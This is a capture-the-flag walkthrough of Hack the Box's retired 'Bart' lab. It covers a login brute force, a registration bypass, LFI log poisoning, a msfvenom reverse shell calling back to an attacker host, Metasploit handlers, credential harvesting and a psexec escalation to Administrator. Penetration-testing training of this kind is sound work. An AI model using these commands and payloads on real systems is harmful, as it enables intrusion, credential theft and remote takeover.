Hack the Box: Bart Walkthrough

Hello friends!! Today we are going to solve another CTF challenge “Bart” which is available online for those who want to increase their skill in penetration testing and black box testing. Bart is retired vulnerable lab presented by Hack the Box for making online penetration practices according to your experience level; they have the collection of vulnerable labs as challenges from beginners to Expert level.

Level: Expert

Task: find user.txt and root.txt file on victim’s machine.

Since these labs are online available therefore they have static IP and IP of sense is 10.10.10.81 so let’s begin with nmap port enumeration.

nmap -sV -p- 10.10.10.81

From given below image, you can observe we find only port 80 is open on target system.

As port 80 is running http, we open the IP address in our browser. As soon as we open the IP address we get redirected to “forum.bart.htb”.

Since htb doesn’t have global DNS, we aren’t going to be able to resolve the site. So we add a DNS entry in our /etc/hosts file to point 10.10.10.81 to both bart.htb and forum.bart.htb.

When we open forum.bart.htb, we find a website that has been built on wordpress.

When we open bart.htb it redirects us to forum.bart.htb. We enumerate directories for both domains and find a directory called “/monitor” for domain bart.htb.

dirb http://bart.htb/

When we open /monitor directory given by dirb scan and find a login page.

We use burpsuite to brute force the login page using /usr/share/wordlists/metasploit/common-root.txt dictionary and find the credentials to be harvery:potter.

We login using these credentials and get redirected to a different domain called monitor.bart.htb

We add the domain name monitor.bart.htb in /etc/hosts file.

Now when we refresh the page we get a page for server monitoring.

Going through the page we find a link to a site and a domain we need to add to /etc/hosts.

We add internal-01.bart.htb we found earlier on the site to /etc/hosts.

We now open internal-01.bart.htb and find a login form.

We capture the login request using burpsuite and modify the request by changing login.php to register.php.

Then we login using the credentials we use to register and find a chat box.

We find a link to an open log, it looks like it may be vulnerable to LFI.

We were not able to access any system file but we were able to access log.php and find access logs.

Now we use log poisoning to get reverse shell. We change the user-agent to run whoami command, when we run the command we get the user name.

We were not able to run command injection, so we first create a reverse shell using msfvenom

msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.14.6 lport=4444 -f exe > shell.exe

After creating our shell, we upload the payload to the target machine using powershell. First we setup our HTTP server using python.

python -m SimpleHTTPServer 80

We setup our listener using metasploit before executing the target machine.

msf > use exploit/multi/handler

msf > exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

msf > exploit(multi/handler) > set lhost 10.10.14.6

msf > exploit(multi/handler) > set lport 4444

msf > exploit(multi/handler) > run

We now execute the payload using log poisoning.

As soon as we execute the payload we get our reverse shell.

After we get the reverse shell we find that the system is 64-bit architecture so we change the payload type to 64-bit architecture.

msf > use windows/local/payload_inject

msf exploit(windows/local/payload_inject) > set payload windows/x64/meterpreter/reverse_tcp

msf exploit(windows/local/payload_inject) > set lhost 10.10.14.6

msf exploit(windows/local/payload_inject) > set lport 1234

msf exploit(windows/local/payload_inject) > set session 1

msf exploit(windows/local/payload_inject) > run

After running the exploit, we get a 64-bit meterpreter shell. Now we can run post modules properly as 32-bit meterpreter was running into problems.

We use autologin post module to find the the password for Administrator user.

msf > use windows/gather/credentials/windows_autologin

msf post(windows/gather/credentials/windows_autologin) > set session 2

msf post(windows/gather/credentials/windows_autologin) > run

Now enumerating the target machine, we find that port 445 is running internally. So we use port forwarding so that we can use our machine to connect with it.

meterpreter > portfwd add -l 443 -p 445 -r 10.10.10.81

Now we use impacket-smbserver to create a smb server in our machine. So that we can share our payload with the target machine.

impacket-smbserver hack /root

Now the the session we had earlier died so port 4444 is free. So we are going to use that payload to get our reverse shell. First we run metasploit in a new tab and setup our listener.

msf > use multi/handler

msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

msf exploit(multi/handler) > set lhost 10.10.14.6

msf exploit(multi/handler) > set lport 4444

msf exploit(multi/handler) > run

msf > use auxiliary/admin/smb/psexec_command

msf auxiliary(admin/smb/psexec_command) > set SMBUser Administrator

msf auxiliary(admin/smb/psexec_command) > set SMBPass 3130438f31186fbaf962f407711faddb

msf auxiliary(admin/smb/psexec_command) > set COMMAND \\\\10.10.14.6\\\hack\\\shell.exe

msf auxiliary(admin/smb/psexec_command) > set rhosts 127.0.0.1

msf auxiliary(admin/smb/psexec_command) > set rport 443

msf auxiliary(admin/smb/psexec_command) > run

As soon as we run psexec auxiliary we get reverse shell with as administrator.

In c:\Users\Administrator\Desktop we find a file called root.txt, when we open it and find our first flag.

Enumerating the system in c:\Users\h.potter we find a file called user.txt. When we take a look at the content of the file we get our second flag.